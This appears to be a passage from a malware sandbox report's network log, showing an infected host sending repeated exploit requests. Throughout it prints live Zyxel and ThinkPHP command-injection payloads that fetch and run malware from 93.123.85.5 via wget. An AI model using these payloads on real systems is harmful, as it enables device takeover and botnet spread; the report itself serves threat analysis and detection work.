                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              847192.168.2.234430494.110.154.748080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:12.561885118 CET16425OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              848192.168.2.235603494.198.143.2138080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:12.563021898 CET16426OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              849192.168.2.234066694.122.17.2378080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:12.592375040 CET16426OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              85192.168.2.235823695.165.109.1198080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:21.420201063 CET2709OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:21.771223068 CET2777INHTTP/1.1 501 Not Implemented
                                                              Cache-Control: no-store
                                                              Connection: close
                                                              Content-Length: 111
                                                              Content-Type: text/html
                                                              Date: Mon, 13 Nov 2023 21:18:19 GMT
                                                              Expires: 0
                                                              Pragma: no-cache
                                                              X-Frame-Options: sameorigin
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 31 20 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 31 20 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a
                                                              Data Ascii: <!doctype html><html lang=en><title>Error 501 : Not Implemented</title><h1>Error 501 : Not Implemented</h1>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              850192.168.2.235141462.29.66.228080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:12.592662096 CET16427OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              851192.168.2.234993231.200.6.738080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:12.600332975 CET16428OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              852192.168.2.2354910112.13.73.19980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:12.770414114 CET16463OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:14.883821964 CET16774OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              853192.168.2.234457695.58.246.13280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:12.797899008 CET16464OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:13.175776005 CET16541INHTTP/1.1 200 OK
                                                              Nov 13, 2023 22:20:13.177830935 CET16542INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                              Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              854192.168.2.234970295.100.217.18280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:12.880975962 CET16480OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:13.341831923 CET16547INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:20:13 GMT
                                                              Date: Mon, 13 Nov 2023 21:20:13 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 63 34 33 33 34 31 37 26 23 34 36 3b 31 36 39 39 39 31 30 34 31 33 26 23 34 36 3b 32 31 61 36 37 38 39 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;2c433417&#46;1699910413&#46;21a67894</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              855192.168.2.2342874112.173.36.23780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:13.479557037 CET16551OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              856192.168.2.2343694112.126.74.6580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:13.490619898 CET16551OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:13.805407047 CET16588INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:20:14 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              857192.168.2.2341058112.126.149.5580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:13.491826057 CET16552OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:13.807781935 CET16588INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:20:13 GMT
                                                              Server: Apache
                                                              Content-Length: 11
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                              Data Ascii: Bad Request


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              858192.168.2.2355026112.13.73.19980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:13.857327938 CET16590OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              859192.168.2.234214094.110.36.2278080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:14.280293941 CET16668OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              86192.168.2.235059088.218.95.16480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:22.130948067 CET2822OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:22.338654041 CET2827INHTTP/1.1 200 OK
                                                              Date: Mon, 13 Nov 2023 21:10:45 GMT
                                                              Server: Apache/2.2.22 (Ubuntu)
                                                              X-Powered-By: PHP/5.3.10-1ubuntu3.26
                                                              Vary: Accept-Encoding
                                                              Content-Encoding: gzip
                                                              Content-Length: 2622
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Content-Type: text/html;charset=utf-8
                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 5c 5b 53 db 48 16 7e 26 55 f9 0f 1a 3d cc 9b 91 2f 5c 4c 30 7e d8 64 6a 77 aa 66 76 a7 b6 98 da dd a7 2d 81 05 36 31 b2 c7 16 21 79 c3 c3 cd 84 3b 31 77 67 20 cb c5 40 c2 2d 90 80 6d 2e 7f 46 2d c9 4f f9 0b db 52 4b 76 fb 22 4b b1 c6 cc 3c 38 05 b6 91 fb 3b fd e9 f4 f9 4e 9f 96 5a f9 92 bd f7 7c f3 ec 1f 4f bb ff f3 d3 77 84 9f 1b 0c 12 3f fd fc 97 1f be 7f 4a 90 36 8a fa 97 eb 29 45 3d eb 7e 46 fc fb 6f dd 3f fe 40 38 9a ed 44 77 84 66 a3 01 2e 10 62 e9 20 45 7d f7 77 92 20 fd 1c 17 7e 42 51 c3 c3 c3 cd c3 ae e6 50 a4 9f ea fe 27 f5 52 b6 e5 90 c1 ea 47 1b 87 21 9b 7d 9c 8f f4 3e 7e e4 51 7a 7c 39 18 64 a3 5d 15 ec 38 3a 3a 3a 10 1c 35 66 68 9f fc 3e c8 70 34 21 b7 b6 31 bf 0c 05 5e 74 91 4f 43 2c c7 b0 9c ad fb 55 98 21 89 5e f4 57 17 c9 31 2f 39 4a 46 77 12 bd 7e 3a 12 65 b8 ae 21 ae cf e6 26 09 4a 36 c3 05 b8 20 e3 15 3e a4 c4 bb 39 61 75 2f b7 75 08 92 07 62 e6 5e fc 78 07 de c4 f8 eb 11 30 93 e1 33 33 f2 eb f5 14 7c 15 ee 47 84 d1 71 31 7b 03 16 e2 b6 22 d8 e6 2d 9f 49 a1 2f a4 d4 44 ee 7f 8b c8 90 94 fa 55 4c 4e ab 4d f9 cc 86 70 f9 11 35 02 e3 b3 d2 65 1a f5 93 7b bf 26 5c 8f 57 00 20 db 38 4c 8f 12 02 17 c1 aa 9f 83 0a 40 bc 8b 60 58 3f a8 91 b0 74 2c 24 ee 6c 88 86 4a e9 fa 58 58 99 04 c7 ab 20 bd 0c 9b 8a 99 14 9f 3e 17 b7 63 45 00 d5 36 46 46 dc 9f 07 f1 43 e4 1f bd f3 01 9b 9b f0 d5 06 66 e3 60 37 a9 77 0e 45 be c2 fb 41 67 52 00 df aa bd 69 ec f1 21 43 8d 14 4a 74 38 ac 9a 29 6f 57 ee 90 a2 31 d2 a5 88 99 2f 1e ce b2 a6 c8 04 1e 36 15 06 12 7d 5d 0e b6 e1 1d 95 7f 8d 62 4b 75 02 ee a9 f2 40 2f e6 aa 44 89 5e a7 28 7a 3d 14 d2 8f a6 47 96 1e 64 ba 48 1f 13 ed 8d 04 c2 b2 ca 31 21 36 34 d6 d0 58 43 63 5f af 31 92 2a 91 d7 73 e6 d5 70 28 e2 8b 36 b4 d5 d0 56 43 5b bf 83 b6 82 01 f6 39 11 61 82 5d 64 94 7b 15 64 a2 7e 86 e1 48 82 83 75 a4 5a 3e f6 46 a1 d8 fc 11 a6 2f 5f 9f 52 1c 33 48 f9 98 3e 7a 28 a8 7c 2d ff 36 cb cd a8 ca b5 29 dd eb 67 6c 72 85 1a 09 05 31 dd b2 21 54 11 f7 85 22 83 6a 41 fa 35 58 58 49 33 70 e0 55 24 a5 95 c6 3d 21 df 2b f9 dd 17 78 41 f4 06 e9 28 2c ab 7b 68 96 65 22 44 2f 44 32 11 a5 8e fe fe c7 bf 12 8f 1f 11 ca bf 68 a4 b7 70 66 45 a7 16 18 a4 fb 99 28 e5 b0 39 9b 07 c2 fd 24 31 1c f0 71 fe ae 8e 36 bb 8a f5 33 81 7e 3f d7 d5 61 57 08 04 03 f0 ad a9 c9 43 0d 05 95 0f ca 1f 43 41 8d 04 4b bf 20 51 83 60 80 20 bc 1e ba c4 a7 a4 37 b7 bf 42 e4 de 7d f2 50 b4 37 6f ad 49 69 5f de 9a 65 86 a3 b0 4d 94 a3 1c 94 d3 49 7a c1 eb 03 fe 36 29 4e 4d 7e 3d da 01 d1 53 29 39 2f d6 82 b6 43 f4 4a 12 1a a8 05 ed e8 20 bd 62 fc bc c6 be 1d 6e d2 2b c4 16 84 91 95 9a d0 ed b0 ef d4 22 48 67 6b 42 b7 c2 be e3 6b 7c 66 aa 26 74 8b 32 62 62 a2 b6 be 5d 90 79 e6 08 dc 2e 57 40 eb c6 97 3f c4 51 ca cc 09 2d 40 fc e8 b1 74 3a 2b ec 27 2b f4 ae 87 a6 23 5c a0 37 c8 20 03 c2 ca 59 6e 35 ab 67 40 49 25 b2 f0 7a 9f f7 47 42 43 ac ef 09 1b 62 99 4e b2 dc 70 78 08 a7 25 cc 1d 48 b3 0b 25 26 31 55 79 28 28 6b f8 5e a2 6f 28 79 02 93 77 93 e7 1b 9b 8d 00 57 fb
                                                              Data Ascii: \[SH~&U=/\L0~djwfv-61!y;1wg @-m.F-ORKv"K<8;NZ|Ow?J6)E=~Fo?@8Dwf.b E}w ~BQP'RG!}>~Qz|9d]8:::5fh>p4!1^tOC,U!^W1/9JFw~:e!&J6 >9au/ub^x033|Gq1{"-I/DULNMp5e{&\W 8L@`X?t,$lJXX >cE6FFCf`7wEAgRi!CJt8)oW1/6}]bKu@/D^(z=GdH1!64XCc_1*sp(6VC[9a]d{d~HuZ>F/_R3H>z(|-6)glr1!T"jA5XXI3pU$=!+xA(,{he"D/D2hpfE(9$1q63~?aWCCAK Q` 7B}P7oIi_eMIz6)NM~=S)9/CJ bn+"HgkBk|f&t2bb]y.W@?Q-@t:+'+#\7 Yn5g@I%zGBCbNpx%H%&1Uy((k^o(ywW
                                                              Nov 13, 2023 22:18:22.338676929 CET2828INData Raw: fc 5d 8a b0 d9 94 23 58 f3 20 d3 c7 a9 52 c4 8e c2 33 b4 c9 44 d0 37 b8 72 fd f9 63 d1 30 cd 7a 61 fe 15 92 1f 50 d1 20 4f 56 7b 17 1e 4a f9 42 69 83 1a 6a 39 00 37 d3 e3 23 35 bf 84 69 9f 2f c0 f6 3f b1 87 5f 12 d8 6f a7 92 60 9e 38 dc 6e f8 59
                                                              Data Ascii: ]#X R3D7rc0zaP OV{JBij97#5i/?_o`8nYRD*9\fPTV8t~hBaX_A$Eb&5"g!"T(Ey(Ra.iZaNGX'HjZ{CF>VqRZp$i2>&/SwtNH$7
                                                              Nov 13, 2023 22:18:22.338706017 CET2829INData Raw: 34 39 9b 55 c4 5a 65 68 c7 af 2d 17 59 46 b3 93 ba 87 c2 f8 92 b2 2e d6 22 c3 36 7c d5 8e 6a a2 e4 34 ba 32 25 1e 5c c0 9a 4e 16 8c b9 bb 09 d5 e1 56 79 ba 4b 3d 09 e3 9e 96 c3 68 6e 0f 8d 1c 18 df 03 f3 3b 26 5d 59 19 fc a0 4b 84 c2 66 74 d3 a9
                                                              Data Ascii: 49UZeh-YF."6|j42%\NVyK=hn;&]YKftDc1q%&rG0B9:"ZHY~c!xnUb-93*Xj2HUV8k8#5i_=bK}+?VxqcB~&X


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              860192.168.2.233583895.86.113.508080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:14.335350990 CET16671OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              861192.168.2.2334874112.165.36.16880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:14.517821074 CET16675OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              862192.168.2.2334220112.15.125.1680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:14.622632027 CET16676OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:15.907171011 CET16894OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
